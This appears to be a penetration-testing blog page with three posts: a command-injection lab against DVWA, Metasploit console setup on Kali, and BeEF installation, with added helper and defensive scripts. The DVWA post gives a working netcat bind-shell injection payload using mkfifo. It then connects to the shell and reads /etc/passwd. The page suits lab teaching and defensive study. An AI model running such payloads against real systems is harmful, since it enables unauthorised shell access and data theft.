Showing posts with label kali linux.

Thursday 26 March 2020

Damn Vulnerable Web App (DVWA) | Command Injection Attack using NetCat

In this post we cover a command injection attack on Damn Vulnerable Web App (DVWA) that uses netcat to plant a bind-shell listener on the target.

Background:
  • What is Damn Vulnerable Web App (DVWA)?
    • Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
    • Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
  • What is Command Execution?
    • Command execution is where a web application exposes the ability to run operating-system commands. DVWA's Command Injection page does this by running ping against a user-supplied address.
  • What is a Command Injection Attack?
    • The purpose of a command injection attack is to inject and execute operating-system commands chosen by the attacker through the vulnerable application.
    • The application then acts as a pseudo system shell: it runs the unwanted commands, and the attacker can use it like an authorised user of the system.
    • Note that the commands run with the same privileges as the application and/or web server (for DVWA on Linux, typically the www-data account).
    • Command injection is possible in most cases because input data is not correctly validated; any attacker-controlled input (forms, cookies, HTTP headers, etc.) can carry the payload.
  • What is a Command Injection Listener Attack?
    • A command injection in which the injected command plants a backdoor listener (a bind shell) on the target, using a common network utility such as netcat.
    • Netcat (nc) is a command-line networking utility for reading from and writing to network connections over TCP or UDP.
      • Unix/Linux example: 9.9.9.9;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
Lab:
1) Access DVWA application on your browser.

2) Click on Command Injection

3) Paste the following into the text box and click Submit.
192.168.43.118;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
  • The page only expects an IP address to ping; everything after the first `;` is run by the shell as additional commands.
  • mkfifo /tmp/pipe creates a FIFO (named pipe), which lets two unrelated processes pass data to each other through the filesystem without having been designed to work together.
  • sh /tmp/pipe starts a shell that reads its commands from the FIFO; its standard output is piped into nc.
  • nc -l 4444 tells netcat to listen on TCP port 4444. Whatever the remote side sends is written into the FIFO (> /tmp/pipe), so it reaches sh, and sh's output goes back out through nc. The FIFO closes the loop that turns the two processes into a bind shell.
  • 192.168.43.118 is the IP address of the DVWA host, so the ping that runs first succeeds before the listener starts.
  • Caveat: the browser request will not complete while the listener is running, because the injected command never exits. Also, `nc -l 4444` is OpenBSD netcat / ncat syntax; with netcat-traditional the listener is `nc -l -p 4444`.
4) Step 3 opens a backdoor: the DVWA host now listens on port 4444 and hands every line it receives to sh, running as the web server's user.

5) Now Login to your Kali Linux machine.

6) Use netcat on Kali Linux to connect to the listener on the DVWA host.
  1. nc 192.168.43.209 4444
    • Connect from Kali to the DVWA netcat session on port 4444 (use the address of your DVWA host). No prompt is shown; type a command and press Enter.
  2. hostname
    • Prints the hostname of the server that hosts DVWA, confirming the commands run there.
  3. cat /etc/passwd
    • Shows the contents of the /etc/passwd file.


In this way we can run any command on the DVWA host from Kali Linux as long as the netcat session on the DVWA machine is alive; every command runs as the web server account, which is what the privilege note above means in practice.
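The following is an added example, not code from DVWA or from the original post. It models what the low-security Command Injection page does (assumption: it builds the string "ping -c 4 <user input>" and hands it to the shell), shows why the payload from the lab runs extra commands, and contrasts the two fixes that the "lack of correct input data validation" point in the background section implies: validate the input, and never let a shell re-parse it. echo stands in for ping so nothing touches the network, and the injected part of the constructed payload is a harmless marker instead of the netcat listener.

```shell
#!/bin/sh
# Added example; not code from DVWA or the original post. "echo" stands in
# for "ping" so the demo is harmless. Assumption: DVWA's low-security page
# builds "ping -c 4 <input>" as one string and hands it to the shell.

# Vulnerable pattern: the user value is spliced into a command string and the
# shell re-parses the whole thing, so ";" (or "|", "&&", "$(...)") starts a
# second command that runs with the web server's privileges.
vuln_ping() {
    sh -c "echo ping -c 4 $1"
}

# Fix 1 (execution): pass the value as a single argv element. No shell
# re-parses it, so a payload becomes one odd but inert argument.
argv_ping() {
    echo ping -c 4 "$1"
}

# Fix 2 (validation): accept only a dotted-quad IPv4 address, octets 0-255.
is_ipv4() {
    octet='(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])'
    printf '%s\n' "$1" | grep -Eq "^($octet\.){3}$octet\$"
}

# Both fixes together: reject anything that is not an address, then run the
# command without a shell in between.
safe_ping() {
    if ! is_ipv4 "$1"; then
        echo "rejected: '$1' is not an IPv4 address" >&2
        return 1
    fi
    echo ping -c 4 "$1"
}

# Constructed payload with the same shape as the one submitted in the lab.
PAYLOAD='192.168.43.118;echo INJECTED-COMMAND-RAN'

# Stand-alone run:
#   vuln_ping "$PAYLOAD"   # second line "INJECTED-COMMAND-RAN": injection worked
#   argv_ping "$PAYLOAD"   # one line; the ";" is just text in the argument
#   safe_ping "$PAYLOAD"   # rejected, exit status 1
```

The allow-list in is_ipv4 is deliberately stricter than "no shell metacharacters": blocking `;` alone leaves `$(...)`, backticks, `|` and newline injection open, whereas accepting only the one shape the page needs closes all of them at once. argv_ping shows that even if validation is skipped, the bypass fails when the command is executed without a shell, which is why the two fixes belong together.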



Monday 2 March 2020

How to Start the Metasploit Framework Console (msfconsole) | Kali Linux | Pen Testing

In this tutorial we cover how to start the Metasploit Framework console on Kali Linux and connect it to its database, in preparation for exploiting the Metasploitable 3 VM.
We assume Kali Linux and Metasploitable 3 are already installed on your machine.

1) Start PostgreSQL DB on Kali Linux
service postgresql start

2) Check PostgreSQL service status
service postgresql status


3) Configure PostgreSQL for Metasploit (creates the msf database and user, and writes the database.yml that msfconsole reads)
msfdb init

4) Start msfconsole
msfconsole

5) Check the DB connection from the msf prompt
db_status

6) You can search for any module from the msf prompt with commands like the one below.
search module_name
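The steps above, as an added script that is not from the original post: it runs them unattended and fails loudly instead of leaving you at a console with no database. It assumes Kali's msfdb and msfconsole wrappers and the postgresql service; the db_status line that db_connected looks for is assumed to read "Connected to msf. Connection type: postgresql." on success, and the two sample lines at the bottom are constructed for an offline check.

```shell
#!/bin/sh
# Added example, not from the original post. Assumptions: Kali's msfdb and
# msfconsole wrappers, a postgresql service, and that a successful db_status
# prints "[*] Connected to msf. Connection type: postgresql." (adjust the
# pattern if your version prints differently).

# Return 0 only if msfconsole's db_status output reports a live database.
db_connected() {
    printf '%s\n' "$1" | grep -q 'Connected to .*Connection type: postgresql'
}

# Steps 1-3: start PostgreSQL, confirm it is up, initialise the msf database.
prepare_msf_db() {
    sudo service postgresql start || return 1
    sudo service postgresql status >/dev/null || return 1
    sudo msfdb init || return 1
}

# Steps 4-5 non-interactively: -q drops the banner, -x runs console commands,
# and the trailing "exit" leaves the console so the output can be inspected.
check_msf_db() {
    out=$(msfconsole -q -x 'db_status; exit' 2>&1) || return 1
    if db_connected "$out"; then
        echo "msfconsole is connected to PostgreSQL"
    else
        echo "no database connection:" >&2
        printf '%s\n' "$out" >&2
        return 1
    fi
}

# Step 6 from a shell: search by module type and a name keyword.
msf_search() {
    msfconsole -q -x "search type:exploit name:$1; exit"
}

# Constructed sample lines (success and failure) for an offline check.
SAMPLE_OK='[*] Connected to msf. Connection type: postgresql.'
SAMPLE_NONE='[*] postgresql selected, no connection'

# Usage: prepare_msf_db && check_msf_db && msf_search smb
```

Running db_status through -x rather than at the prompt is what makes the check scriptable; if the database is down, msfconsole still starts, but module search and workspace data silently fall back to no database, which is exactly the state this script refuses to continue from.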







Wednesday 26 February 2020

BEEF Installation on Kali Linux


The following installation instructions are suitable for Linux based operating systems.
In theory, BeEF should work on any operating system that can run Ruby 2.5+ and Node.js. However, only macOS and Linux are officially supported.
You will not find macOS installation instructions in this guide; they are currently high on the list of wiki tasks to be completed.

It is highly recommended that you use a Ruby environment manager (RVM) when installing BeEF on Ubuntu, because of restricted permissions. Note that you do not need to install Ruby separately if you use RVM, since it installs Ruby for you.
In order to install BeEF and RVM you first need Git and curl, which do not come out of the box with Ubuntu.
$ sudo apt-get install git
$ sudo apt-get install curl
To install RVM, firstly go to https://rvm.io/rvm/install and install the GPG keys. Then install RVM, without dependencies:
$ \curl -sSL https://get.rvm.io | bash -s -- --autolibs=install-packages 
Now install those dependencies as root while in the application user's $HOME directory:
$ sudo .rvm/bin/rvm requirements 
Now that the dependencies are installed we need to install the stable releases of both RVM and Ruby. As the application user enter:
$ \curl -sSL https://get.rvm.io | bash -s stable --ruby
BeEF requires Ruby 2.5.x. Before navigating to the beef directory run:
$ rvm install "ruby-2.5.3"
Then reload your shell (open a new terminal, or run `source ~/.rvm/scripts/rvm`).
You can verify your installation of RVM and Ruby by running:
$ rvm -v
$ ruby -v
After following the above steps, simply clone the repository and install BeEF as per below.

Source

Obtain application source code either by downloading the latest archive:
$ wget https://github.com/beefproject/beef/archive/master.zip
Or cloning the Git repository from Github:
$ git clone https://github.com/beefproject/beef

Installation

Once a suitable version of Ruby is installed, run the install script in the BeEF directory:
$ ./install
This script installs the required operating system packages and all the prerequisite Ruby gems.
If the installation fails with a "rake not found" error, install rake and re-run ./install:
gem install rake -v '13.0.1'
Upon successful installation, be sure to read the Configuration page on the wiki for important details on configuring and securing BeEF.

Start BeEF

To start BeEF, first change the username and password in config.yaml (the user and passwd entries in the credentials block, which ship as beef/beef and protect the web UI and the hooked browsers behind it), then simply run:
  $ ./beef
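An added pre-flight check to run before ./beef, which is not part of BeEF or the original post. It enforces the two things the guide asks for: Ruby 2.5 or newer, and credentials that are no longer the stock beef/beef. Assumptions: config.yaml keeps the web UI login as "user:" and "passwd:" keys in the credentials block under "beef:"; the config fragment written by sample_config is constructed for this demo.

```shell
#!/bin/sh
# Added example, not part of BeEF or the original post. Assumptions: BeEF's
# config.yaml stores the UI login as quoted "user:" and "passwd:" values in
# the credentials block under "beef:", both shipping as "beef". The file
# written by sample_config is a constructed stand-in for config.yaml.

# Return 0 if a Ruby version string (e.g. 2.5.3) is at least 2.5.
ruby_version_ok() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    [ "$major" -gt 2 ] || { [ "$major" -eq 2 ] && [ "$minor" -ge 5 ]; }
}

# Extract a double-quoted YAML value by key:  cred_value config.yaml passwd
cred_value() {
    grep -E "^[[:space:]]*$2:[[:space:]]*\"" "$1" | head -n 1 |
        sed -E 's/^[^"]*"([^"]*)".*/\1/'
}

# Return 0 (a problem) if either credential is still the stock value.
default_creds() {
    u=$(cred_value "$1" user)
    p=$(cred_value "$1" passwd)
    [ "$u" = "beef" ] || [ "$p" = "beef" ]
}

# Run both checks; exit non-zero rather than start BeEF with a known login.
preflight() {
    rv=$(ruby -e 'print RUBY_VERSION') || { echo "ruby not found" >&2; return 1; }
    ruby_version_ok "$rv" || { echo "Ruby $rv is too old; BeEF needs 2.5+" >&2; return 1; }
    if default_creds "$1"; then
        echo "refusing to start: default beef/beef credentials still in $1" >&2
        return 1
    fi
    echo "preflight ok: Ruby $rv, credentials changed in $1"
}

# Constructed config fragment mirroring the layout described above.
sample_config() {   # $1 = path, $2 = user, $3 = passwd
    printf 'beef:\n    credentials:\n        user:   "%s"\n        passwd: "%s"\n' \
        "$2" "$3" > "$1"
}

# Usage:  preflight config.yaml && ./beef
```

The check treats either credential still being "beef" as a failure, not just the pair: an unchanged password with a renamed user is still a guessable login to a console that can drive every hooked browser, and that is the configuration mistake the wiki's "securing BeEF" note is warning about.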